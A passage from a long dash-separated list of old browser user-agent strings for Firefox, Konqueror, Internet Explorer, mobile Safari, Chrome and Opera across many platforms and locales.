pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.2) Gecko/20090911 Slackware Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9b5) Gecko/2008041515 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.11) Gecko/20101028 CentOS/3.6-2.el5.centos Firefox/3.6.11 -Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) 
Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 GTB5 -Mozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.11) Gecko/20100720 Firefox/3.5.11 -Mozilla/5.0 (X11; U; Linux; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Mac OSX; it; rv:1.9.0.7) Gecko/2009030422 Firefox/3.0.7 -Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.9.2.12) Gecko/20101030 Firefox/3.6.12 -Mozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.9.0.1) Gecko/2008081402 Firefox/3.0.1 -Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 -Mozilla/5.0 (X11; U; Slackware Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5 -Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4 -Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4 -Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0 -Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (X11; U; SunOS sun4u; it-IT; ) Gecko/20080000 Firefox/3.0 -Mozilla/5.0 (X11; U; Windows NT 5.0; en-US; rv:1.9b4) Gecko/2008030318 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12 -Mozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 -Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515) -Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR) -Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko) -Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.15-1.2054_FC5; X11; i686; en_US) KHTML/3.5.4 (like Gecko) -Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.16-2-k7) KHTML/3.5.0 (like Gecko) (Debian package 4:3.5.0-2bpo2) -Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Debian) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; fr-FR) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET 
CLR 2.0.50727) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) -Mozilla/5.0 (compatible; Yahoo! Slurp;http://help.yahoo.com/help/us/ysearch/slurp) -Mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html) -Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.1021.10gin_lib.cc -Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B360 Safari/531.21.10 -Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 -Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 -Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 -Mozilla/5.0 (iPhone Simulator; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7D11 Safari/531.21.10 -Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B5097d Safari/6531.22.7 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 -Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 -Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.60 Safari/534.30 -Mozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13 -Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6 -Mozilla/5.0(iPad; U; CPU 
iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10 -Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc -Mozilla/6.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:2.0.0.0) Gecko/20061028 Firefox/3.0 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.7 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729) -Mozilla/6.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729) -Opera 9.4 (Windows NT 5.3; U; en) -Opera 9.4 (Windows NT 6.1; U; en) -Opera 9.7 (Windows NT 5.2; U; en) -Opera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2 -Opera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60 -Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60 -Opera/2.0.3920 (J2ME/MIDP; Opera Mini; en; U; ssr) -Opera/7.23 (Windows 98; U) [en] -Opera/8.0 (X11; Linux i686; U; cs) -Opera/8.00 (Windows NT 5.1; U; en) -Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr) -Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1316; fi; U; ssr) -Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4719; en; U; ssr) -Opera/8.02 (Qt embedded; Linux armv4ll; U) [en] SONY/COM1 -Opera/8.02 (Windows NT 5.1; U; en) -Opera/8.5 (X11; Linux i686; U; cs) -Opera/8.50 (Windows NT 5.1; U; en) -Opera/8.51 (Windows NT 5.1; U; en) -Opera/9.0 (Windows NT 5.0; U; en) -Opera/9.00 (Macintosh; PPC Mac OS X; U; en) -Opera/9.00 (Wii; U; ; 1038-58; Wii Shop Channel/1.0; en) -Opera/9.00 (Windows NT 5.1; U; en) -Opera/9.00 (Windows NT 5.2; U; en) -Opera/9.00 (Windows NT 6.0; U; en) -Opera/9.01 (X11; Linux i686; U; en) -Opera/9.02 (Windows NT 5.1; U; en) -Opera/9.10 (Windows NT 5.1; U; MEGAUPLOAD 1.0; pl) -Opera/9.10 (Windows NT 5.1; U; es-es) -Opera/9.10 (Windows NT 5.1; U; fi) -Opera/9.10 (Windows NT 5.1; U; hu) -Opera/9.10 (Windows NT 5.1; U; it) -Opera/9.10 (Windows NT 5.1; U; nl) -Opera/9.10 (Windows NT 5.1; U; pl) -Opera/9.10 (Windows NT 5.1; U; pt) -Opera/9.10 (Windows NT 5.1; U; sv) -Opera/9.10 (Windows NT 5.1; U; zh-tw) -Opera/9.10 (Windows NT 5.2; U; de) -Opera/9.10 (Windows NT 5.2; U; en) -Opera/9.10 (Windows NT 6.0; U; en) -Opera/9.10 (Windows NT 6.0; U; it-IT) -Opera/9.10 (X11; Linux i386; U; en) -Opera/9.10 (X11; Linux i686; U; en) -Opera/9.10 (X11; Linux i686; U; kubuntu;pl) -Opera/9.10 (X11; Linux i686; U; pl) -Opera/9.10 (X11; Linux x86_64; U; en) -Opera/9.10 (X11; Linux; U; en) -Opera/9.12 (Windows NT 5.0; U) -Opera/9.12 (Windows NT 5.0; U; ru) -Opera/9.12 (X11; Linux i686; U; en) (Ubuntu) -Opera/9.20 (Windows NT 5.1; U; MEGAUPLOAD=1.0; es-es) -Opera/9.20 (Windows NT 5.1; U; en) -Opera/9.20 (Windows NT 5.1; U; es-AR) -Opera/9.20 (Windows NT 5.1; U; es-es) -Opera/9.20 (Windows NT 5.1; U; it) -Opera/9.20 (Windows NT 5.1; U; nb) -Opera/9.20 (Windows NT 5.1; U; zh-tw) -Opera/9.20 (Windows NT 5.2; U; en) -Opera/9.20 (Windows NT 6.0; U; de) -Opera/9.20 (Windows NT 6.0; U; en) -Opera/9.20 (Windows NT 6.0; U; es-es) -Opera/9.20 (X11; Linux i586; U; en) -Opera/9.20 (X11; Linux i686; U; en) -Opera/9.20 
(X11; Linux i686; U; es-es) -Opera/9.20 (X11; Linux i686; U; pl) -Opera/9.20 (X11; Linux i686; U; ru) -Opera/9.20 (X11; Linux i686; U; tr) -Opera/9.20 (X11; Linux ppc; U; en) -Opera/9.20 (X11; Linux x86_64; U; en) -Opera/9.20(Windows NT 5.1; U; en) -Opera/9.21 (Macintosh; Intel Mac OS X; U; en) -Opera/9.21 (Macintosh; PPC Mac OS X; U; en) -Opera/9.21 (Windows 98; U; en) -Opera/9.21 (Windows NT 5.0; U; de) -Opera/9.21 (Windows NT 5.1; U; MEGAUPLOAD 1.0; en) -Opera/9.21 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) -Opera/9.21 (Windows NT 5.1; U; de) -Opera/9.21 (Windows NT 5.1; U; en) -Opera/9.21 (Windows NT 5.1; U; fr) -Opera/9.21 (Windows NT 5.1; U; nl) -Opera/9.21 (Windows NT 5.1; U; pl) -Opera/9.21 (Windows NT 5.1; U; pt-br) -Opera/9.21 (Windows NT 5.1; U; ru) -Opera/9.21 (Windows NT 5.2; U; en) -Opera/9.21 (Windows NT 6.0; U; en) -Opera/9.21 (Windows NT 6.0; U; nb) -Opera/9.21 (X11; Linux i686; U; de) -Opera/9.21 (X11; Linux i686; U; en) -Opera/9.21 (X11; Linux i686; U; es-es) -Opera/9.21 (X11; Linux x86_64; U; en) -Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) -Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 2.0; ru) -Opera/9.22 (Windows NT 5.1; U; en) -Opera/9.22 (Windows NT 5.1; U; fr) -Opera/9.22 (Windows NT 5.1; U; pl) -Opera/9.22 (Windows NT 6.0; U; en) -Opera/9.22 (Windows NT 6.0; U; ru) -Opera/9.22 (X11; Linux i686; U; de) -Opera/9.22 (X11; Linux i686; U; en) -Opera/9.22 (X11; OpenBSD i386; U; en) -Opera/9.23 (Mac OS X; fr) -Opera/9.23 (Mac OS X; ru) -Opera/9.23 (Macintosh; Intel Mac OS X; U; ja) -Opera/9.23 (Nintendo Wii; U; ; 1038-58; Wii Internet Channel/1.0; en) -Opera/9.23 (Windows NT 5.0; U; de) -Opera/9.23 (Windows NT 5.0; U; en) -Opera/9.23 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) -Opera/9.23 (Windows NT 5.1; U; da) -Opera/9.23 (Windows NT 5.1; U; de) -Opera/9.23 (Windows NT 5.1; U; en) -Opera/9.23 (Windows NT 5.1; U; fi) -Opera/9.23 (Windows NT 5.1; U; it) -Opera/9.23 (Windows NT 5.1; U; ja) -Opera/9.23 (Windows NT 5.1; U; pt) -Opera/9.23 (Windows NT 5.1; U; zh-cn) -Opera/9.23 (Windows NT 6.0; U; de) -Opera/9.23 (X11; Linux i686; U; en) -Opera/9.23 (X11; Linux i686; U; es-es) -Opera/9.23 (X11; Linux x86_64; U; en) -Opera/9.24 (Macintosh; PPC Mac OS X; U; en) -Opera/9.24 (Windows NT 5.0; U; ru) -Opera/9.24 (Windows NT 5.1; U; ru) -Opera/9.24 (Windows NT 5.1; U; tr) -Opera/9.24 (X11; Linux i686; U; de) -Opera/9.24 (X11; SunOS i86pc; U; en) -Opera/9.25 (Macintosh; Intel Mac OS X; U; en) -Opera/9.25 (Macintosh; PPC Mac OS X; U; en) -Opera/9.25 (OpenSolaris; U; en) -Opera/9.25 (Windows NT 4.0; U; en) -Opera/9.25 (Windows NT 5.0; U; cs) -Opera/9.25 (Windows NT 5.0; U; en) -Opera/9.25 (Windows NT 5.1; U; MEGAUPLOAD 1.0; pt-br) -Opera/9.25 (Windows NT 5.1; U; de) -Opera/9.25 (Windows NT 5.1; U; lt) -Opera/9.25 (Windows NT 5.1; U; ru) -Opera/9.25 (Windows NT 5.1; U; zh-cn) -Opera/9.25 (Windows NT 5.2; U; en) -Opera/9.25 (Windows NT 6.0; U; MEGAUPLOAD 1.0; ru) -Opera/9.25 (Windows NT 6.0; U; SV1; MEGAUPLOAD 2.0; ru) -Opera/9.25 (Windows NT 6.0; U; en-US) -Opera/9.25 (Windows NT 6.0; U; ru) -Opera/9.25 (Windows NT 6.0; U; sv) -Opera/9.25 (X11; Linux i686; U; en) -Opera/9.25 (X11; Linux i686; U; fr) -Opera/9.25 (X11; Linux i686; U; fr-ca) -Opera/9.26 (Macintosh; PPC Mac OS X; U; en) -Opera/9.26 (Windows NT 5.1; U; MEGAUPLOAD 2.0; en) -Opera/9.26 (Windows NT 5.1; U; de) -Opera/9.26 (Windows NT 5.1; U; nl) -Opera/9.26 (Windows NT 5.1; U; pl) -Opera/9.26 (Windows NT 5.1; U; zh-cn) -Opera/9.27 (Macintosh; Intel Mac OS X; U; sv) -Opera/9.27 (Windows NT 5.1; U; ja) 
-Opera/9.27 (Windows NT 5.2; U; en) -Opera/9.27 (X11; Linux i686; U; en) -Opera/9.27 (X11; Linux i686; U; fr) -Opera/9.30 (Nintendo Wii; U; ; 2047-7; de) -Opera/9.30 (Nintendo Wii; U; ; 2047-7; fr) -Opera/9.30 (Nintendo Wii; U; ; 2047-7;en) -Opera/9.30 (Nintendo Wii; U; ; 2047-7;es) -Opera/9.30 (Nintendo Wii; U; ; 2047-7;pt-br) -Opera/9.30 (Nintendo Wii; U; ; 2071; Wii Shop Channel/1.0; en) -Opera/9.5 (Windows NT 5.1; U; fr) -Opera/9.5 (Windows NT 6.0; U; en) -Opera/9.50 (Macintosh; Intel Mac OS X; U; de) -Opera/9.50 (Macintosh; Intel Mac OS X; U; en) -Opera/9.50 (Windows NT 5.1; U; es-ES) -Opera/9.50 (Windows NT 5.1; U; it) -Opera/9.50 (Windows NT 5.1; U; nl) -Opera/9.50 (Windows NT 5.1; U; nn) -Opera/9.50 (Windows NT 5.1; U; ru) -Opera/9.50 (Windows NT 5.2; U; it) -Opera/9.50 (X11; Linux i686; U; es-ES) -Opera/9.50 (X11; Linux ppc; U; en) -Opera/9.50 (X11; Linux x86_64; U; nb) -Opera/9.50 (X11; Linux x86_64; U; pl) -Opera/9.51 (Macintosh; Intel Mac OS X; U; en) -Opera/9.51 (Windows NT 5.1; U; da) -Opera/9.51 (Windows NT 5.1; U; en) -Opera/9.51 (Windows NT 5.1; U; en-GB) -Opera/9.51 (Windows NT 5.1; U; es-AR) -Opera/9.51 (Windows NT 5.1; U; es-LA) -Opera/9.51 (Windows NT 5.1; U; fr) -Opera/9.51 (Windows NT 5.1; U; nn) -Opera/9.51 (Windows NT 5.2; U; en) -Opera/9.51 (Windows NT 6.0; U; en) -Opera/9.51 (Windows NT 6.0; U; es) -Opera/9.51 (Windows NT 6.0; U; sv) -Opera/9.51 (X11; Linux i686; U; Linux Mint; en) -Opera/9.51 (X11; Linux i686; U; de) -Opera/9.51 (X11; Linux i686; U; fr) -Opera/9.52 (Macintosh; Intel Mac OS X; U; pt) -Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR) -Opera/9.52 (Macintosh; PPC Mac OS X; U; fr) -Opera/9.52 (Macintosh; PPC Mac OS X; U; ja) -Opera/9.52 (Windows NT 5.0; U; en) -Opera/9.52 (Windows NT 5.2; U; ru) -Opera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en) -Opera/9.52 (Windows NT 6.0; U; de) -Opera/9.52 (Windows NT 6.0; U; en) -Opera/9.52 (Windows NT 6.0; U; fr) -Opera/9.52 (X11; Linux i686; U; cs) -Opera/9.52 (X11; Linux i686; U; en) -Opera/9.52 (X11; Linux i686; U; fr) -Opera/9.52 (X11; Linux ppc; U; de) -Opera/9.52 (X11; Linux x86_64; U) -Opera/9.52 (X11; Linux x86_64; U; en) -Opera/9.52 (X11; Linux x86_64; U; ru) -Opera/9.60 (Windows NT 5.0; U; en) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; en-GB) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; es-ES) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; sv) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; tr) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; bg) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; de) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; ru) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; uk) Presto/2.1.1 -Opera/9.60 (X11; Linux i686; U; en-GB) Presto/2.1.1 -Opera/9.60 (X11; Linux i686; U; ru) Presto/2.1.1 -Opera/9.60 (X11; Linux x86_64; U) -Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; cs) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; de) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; en) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; en-GB) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; fr) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; ru) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; zh-cn) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; zh-tw) Presto/2.1.1 -Opera/9.61 (Windows NT 5.2; U; en) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; en) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; http://lucideer.com; en-GB) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; pt-BR) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; 
ru) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; de) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; en) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; pl) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; ru) Presto/2.1.1 -Opera/9.61 (X11; Linux x86_64; U; fr) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; pl) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; pt-BR) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; ru) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; tr) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; zh-cn) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; zh-tw) Presto/2.1.1 -Opera/9.62 (Windows NT 5.2; U; en) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; en) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; en-GB) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; nb) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.62 (Windows NT 6.1; U; de) Presto/2.1.1 -Opera/9.62 (Windows NT 6.1; U; en) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; Linux Mint; en) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; fi) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; it) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1 -Opera/9.62 (X11; Linux x86_64; U; ru) Presto/2.1.1 -Opera/9.63 (Windows NT 5.1; U; pt-BR) Presto/2.1.1 -Opera/9.63 (Windows NT 5.2; U; de) Presto/2.1.1 -Opera/9.63 (Windows NT 5.2; U; en) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; en) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; fr) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; nb) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.63 (Windows NT 6.1; U; de) Presto/2.1.1 -Opera/9.63 (Windows NT 6.1; U; en) Presto/2.1.1 -Opera/9.63 (Windows NT 6.1; U; hu) Presto/2.1.1 -Opera/9.63 (X11; FreeBSD 7.1-RELEASE i386; U; en) Presto/2.1.1 -Opera/9.63 (X11; Linux i686) -Opera/9.63 (X11; Linux i686; U; de) Presto/2.1.1 -Opera/9.63 (X11; Linux i686; U; en) -Opera/9.63 (X11; Linux i686; U; nb) Presto/2.1.1 -Opera/9.63 (X11; Linux i686; U; ru) -Opera/9.63 (X11; Linux i686; U; ru) Presto/2.1.1 -Opera/9.63 (X11; Linux x86_64; U; cs) Presto/2.1.1 -Opera/9.63 (X11; Linux x86_64; U; ru) Presto/2.1.1 -Opera/9.64 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.64 (Windows NT 6.0; U; zh-cn) Presto/2.1.1 -Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1 -Opera/9.64 (Windows NT 6.1; U; de) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; Linux Mint; it) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; da) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; de) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; en) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; nb) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; sv) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; tr) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; cs) Presto/2.1.1 